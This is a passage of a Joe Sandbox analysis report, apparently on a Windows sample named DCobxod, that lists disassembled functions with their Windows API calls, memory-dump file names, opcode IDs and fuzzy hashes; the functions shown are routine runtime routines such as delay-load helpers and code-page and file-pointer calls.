                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: b63f8cefae43345fe61fedb41e0c8b720d8ae4f25c716f59ff12a200debbe529
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: b63f8cefae43345fe61fedb41e0c8b720d8ae4f25c716f59ff12a200debbe529
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 96c9bbcc0cebe2a7ebf9c13628d2b3e1f6b997e1ddaca54e42aa493118ff0196
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 96c9bbcc0cebe2a7ebf9c13628d2b3e1f6b997e1ddaca54e42aa493118ff0196
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: c5251c1625270233d7ddb58a36a230e4fbf527cee46273451d23444079dc7a56
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: c5251c1625270233d7ddb58a36a230e4fbf527cee46273451d23444079dc7a56
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 65e223489a643bb5567618ba5091bfe6f5872aab368d50686cbeea36aa9ab6b1
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 65e223489a643bb5567618ba5091bfe6f5872aab368d50686cbeea36aa9ab6b1
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 6a234aa8741994fc2dba18073a8a754bb7bb023ae25dfd26a113e49f76455073
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 6a234aa8741994fc2dba18073a8a754bb7bb023ae25dfd26a113e49f76455073
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 77695996551353eff5685450c2cd594d2469ede69048eac8161e77a0689f7ac5
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 77695996551353eff5685450c2cd594d2469ede69048eac8161e77a0689f7ac5
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 5564f50ce0f8a6f4a6b686f527e652b718b4095c67b53b1210ea3c10c50039b6
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 5564f50ce0f8a6f4a6b686f527e652b718b4095c67b53b1210ea3c10c50039b6
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 7e1e974f04a2ab04ef73f28740afad4adc89ac1ded6271d598f1e35c1c71e3dc
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 7e1e974f04a2ab04ef73f28740afad4adc89ac1ded6271d598f1e35c1c71e3dc
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 40868d44d472c487ebc53c1fdb9a1a4e0f7df3b9507dae6f90955456279109b3
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 40868d44d472c487ebc53c1fdb9a1a4e0f7df3b9507dae6f90955456279109b3
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              • Opcode ID: 80ed5f9093537b08e6bd13445a5a2fe88b97ee23f2a485a23421d802a6a0d7f7
                                                              • Instruction ID: b665772d63f702252b04651a3cf79868e494c0f96761d68b8eac1d0ed4723798
                                                              • Opcode Fuzzy Hash: 80ed5f9093537b08e6bd13445a5a2fe88b97ee23f2a485a23421d802a6a0d7f7
                                                              • Instruction Fuzzy Hash: 1BA011C23AA022BC300822833C02C3B020CC0C2FA83B2882FF8028A080B8880C82083A
                                                              Function 0042E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              • Opcode ID: d64120260282a9d86544ba49fc981f023bc3a3267ecc23971e29e609085c6a6d
                                                              • Instruction ID: b665772d63f702252b04651a3cf79868e494c0f96761d68b8eac1d0ed4723798
                                                              • Opcode Fuzzy Hash: d64120260282a9d86544ba49fc981f023bc3a3267ecc23971e29e609085c6a6d
                                                              • Instruction Fuzzy Hash: 1BA011C23AA022BC300822833C02C3B020CC0C2FA83B2882FF8028A080B8880C82083A
                                                              Function 0042E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              • Opcode ID: 159c795be42cf59f5e1d19d430bd10ef89b2c840c4ef6474fabcb537ae72d263
                                                              • Instruction ID: b665772d63f702252b04651a3cf79868e494c0f96761d68b8eac1d0ed4723798
                                                              • Opcode Fuzzy Hash: 159c795be42cf59f5e1d19d430bd10ef89b2c840c4ef6474fabcb537ae72d263
                                                              • Instruction Fuzzy Hash: 1BA011C23AA022BC300822833C02C3B020CC0C2FA83B2882FF8028A080B8880C82083A
                                                              Function 0042E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              • Opcode ID: 0e3eadfd8fa39552413713397c233cf9b6bd71d28f7d71d6313422a49ed10426
                                                              • Instruction ID: b665772d63f702252b04651a3cf79868e494c0f96761d68b8eac1d0ed4723798
                                                              • Opcode Fuzzy Hash: 0e3eadfd8fa39552413713397c233cf9b6bd71d28f7d71d6313422a49ed10426
                                                              • Instruction Fuzzy Hash: 1BA011C23AA022BC300822833C02C3B020CC0C2FA83B2882FF8028A080B8880C82083A
                                                              Function 0043BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0043B7BB: GetOEMCP.KERNEL32(00000000,?,?,0043BA44,?), ref: 0043B7E6
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0043BA89,?,00000000), ref: 0043BC64
                                                              • GetCPInfo.KERNEL32(00000000,0043BA89,?,?,?,0043BA89,?,00000000), ref: 0043BC77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 7c63db48c8fa162f3aa78e97102246b5fa960fc000e60d4bc94be8ecc6a62486
                                                              • Instruction ID: 9a53a8cb38cc173c6190dce8cd87c77e711b33e704eb279691de1fae3b0c9d90
                                                              • Opcode Fuzzy Hash: 7c63db48c8fa162f3aa78e97102246b5fa960fc000e60d4bc94be8ecc6a62486
                                                              • Instruction Fuzzy Hash: FC513370A002059EDB20CF76C8817BBBBE4EF49304F18606FD6968B291D73C99468BD8
                                                              Function 00419A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00419A50,?,?,00000000,?,?,00418CBC,?), ref: 00419BAB
                                                              • GetLastError.KERNEL32(?,00000000,00418411,-00009570,00000000,000007F3), ref: 00419BB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: f213aad2920f8a63fad780adb8b91db6bd0b2cab2d266a5f5cbe2e3423f37767
                                                              • Instruction ID: 44e9f15f4ce0ee593e4ad56eb1080a8cdd08d62b311297f56431d59d2f0b1737
                                                              • Opcode Fuzzy Hash: f213aad2920f8a63fad780adb8b91db6bd0b2cab2d266a5f5cbe2e3423f37767
                                                              • Instruction Fuzzy Hash: 2C41FF70A083418FDB24DF15E5A45ABB7E5FFD5720F148A2FE88183360D778BC858A5A
